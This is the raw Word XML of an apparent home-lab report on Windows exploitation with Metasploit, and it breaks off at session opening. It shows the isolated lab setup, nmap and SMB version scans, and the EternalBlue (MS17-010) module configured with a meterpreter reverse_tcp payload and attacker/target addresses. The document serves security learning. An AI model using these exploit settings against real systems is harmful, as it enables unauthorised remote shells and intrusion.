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AF29FE" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Privilege Escalation Using Metasploit — Home Lab Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA96C5" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="32010166">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6BE76" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="table-of-contents"/>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E585DD" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D56AF" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lab Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13036AE4" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05287536" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Target Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C255DEC" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Network Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091279C" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploitation Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA975B3" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F150854" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Target Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED501C" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F273AF5" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gaining Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D9B5A" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D9713" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execution and Session Opening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C698366" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2D58A" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77270824" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F703468" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uploading and Executing BeRoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E973FD6" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B78EE94" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lateral Movement Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396564BB" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Legal and Licensing Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D61FEC" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9346E0" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="6B9F8609">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312C450" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="introduction"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201FFBD" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>This report documents the setup and execution of a Windows privilege escalation lab using Metasploit Framework within a home lab environment. The purpose is to demonstrate post-exploitation techniques including password hash dumping, local security auditing, and identifying misconfigurations for potential lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCC4DC" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="61E5FB42">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D9058A" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="lab-environment-setup"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Lab Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB63BE7" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="attacker-machine"/>
      <w:r>
        <w:t>2.1 Attacker Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324CC4E" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OS: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEBFCC" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework v6.4.69-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D0F1DD" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="target-machine"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>2.2 Target Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB95AF" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OS: Windows 7 Enterprise SP1 (90-day Evaluation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A31B8" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Network: Host-Only Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58221CD6" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="network-configuration"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>2.3 Network Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9120A" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Both VMs are configured with VMware Host-Only networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5CA5E" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker IP: 192.168.145.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156175F5" w14:textId="42578353" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Target IP: 192.168.145.1</w:t>
      </w:r>
      <w:r w:rsidR="007A7439">
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D11F04" w14:textId="569FB877" w:rsidR="005A7059" w:rsidRDefault="005A7059" w:rsidP="005A7059">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008D7364">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4874892B" wp14:editId="39BF0B97">
            <wp:extent cx="5731510" cy="4196715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1425932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9326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EA81" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 1: VMware Network Adapter Settings for Kali and Windows 7 VMs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 2: IP Configuration Verification and Ping Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F4109" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="4EE4F3B5">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BEDEDE" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="exploitation-phase"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Exploitation Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078DA5E" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="metasploit-initialization"/>
      <w:r>
        <w:t>3.1 Metasploit Initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E1B51" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL service started and confirmed via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>systemctl status postgresql</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504AE417" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit connected: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64168E5C" w14:textId="506039EF" w:rsidR="005A7059" w:rsidRDefault="005A7059" w:rsidP="005A7059">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084705D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="169B6FDA" wp14:editId="641EB27E">
            <wp:extent cx="5731510" cy="2745105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9056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00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D353F" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 3: Metasploit Initialization and Database Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90AB7F" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="target-enumeration"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>3.2 Target Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0FF968" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="nmap-scan"/>
      <w:r>
        <w:t>3.2.1 Nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC1C48" w14:textId="6E7B5B1A" w:rsidR="005674D0" w:rsidRPr="005A7059" w:rsidRDefault="00000000" w:rsidP="005A7059">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidR="005A7059">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.145.1</w:t>
      </w:r>
      <w:r w:rsidR="007A7439">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56622093" w14:textId="026CDAF9" w:rsidR="005A7059" w:rsidRDefault="005A7059">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r w:rsidRPr="00245A34">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="251941EC" wp14:editId="345E5C00">
            <wp:extent cx="5731510" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5285220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52200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5CBDF" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 4: Nmap Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB226C" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="smb-version-detection"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>3.2.2 SMB Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC45F2E" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B84284C" w14:textId="264DE705" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary/scanner/smb/smb_version</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS 192.168.145.1</w:t>
      </w:r>
      <w:r w:rsidR="005A7059">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A869EB" w14:textId="6EF40F05" w:rsidR="005A7059" w:rsidRDefault="005A7059">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23F12AEE" wp14:editId="7608A687">
            <wp:extent cx="5731510" cy="2780665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="297586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5868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F9D66" w14:textId="77777777" w:rsidR="005A7059" w:rsidRDefault="005A7059">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180ADB7B" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 5: SMB Version Detection Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7392B880" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="vulnerability-identification"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>3.3 Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCF6E4" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Target found vulnerable to EternalBlue (MS17-010).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1258745A" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="406653B3">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66746D45" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="gaining-initial-access"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t>4. Gaining Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B90E256" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="exploit-module"/>
      <w:r>
        <w:t>4.1 Exploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047B0CC" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79563462" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B248F3B" w14:textId="2AEABB68" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RHOSTS: 192.168.145.1</w:t>
      </w:r>
      <w:r w:rsidR="005A7059">
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4497BF8C" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LHOST: 192.168.145.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C341B" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="execution-and-session-opening"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2 Execution and Session Opening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C103C52" w14:textId="05E6E00C" w:rsidR="005A7059" w:rsidRPr="005A7059" w:rsidRDefault="005A7059" w:rsidP="005A7059">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA000E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052DE010" wp14:editId="4BF98607">
            <wp:extent cx="5731510" cy="4245610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="159469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46904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36701" w14:textId="77777777" w:rsidR="005A7059" w:rsidRPr="005A7059" w:rsidRDefault="005A7059" w:rsidP="005A7059">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
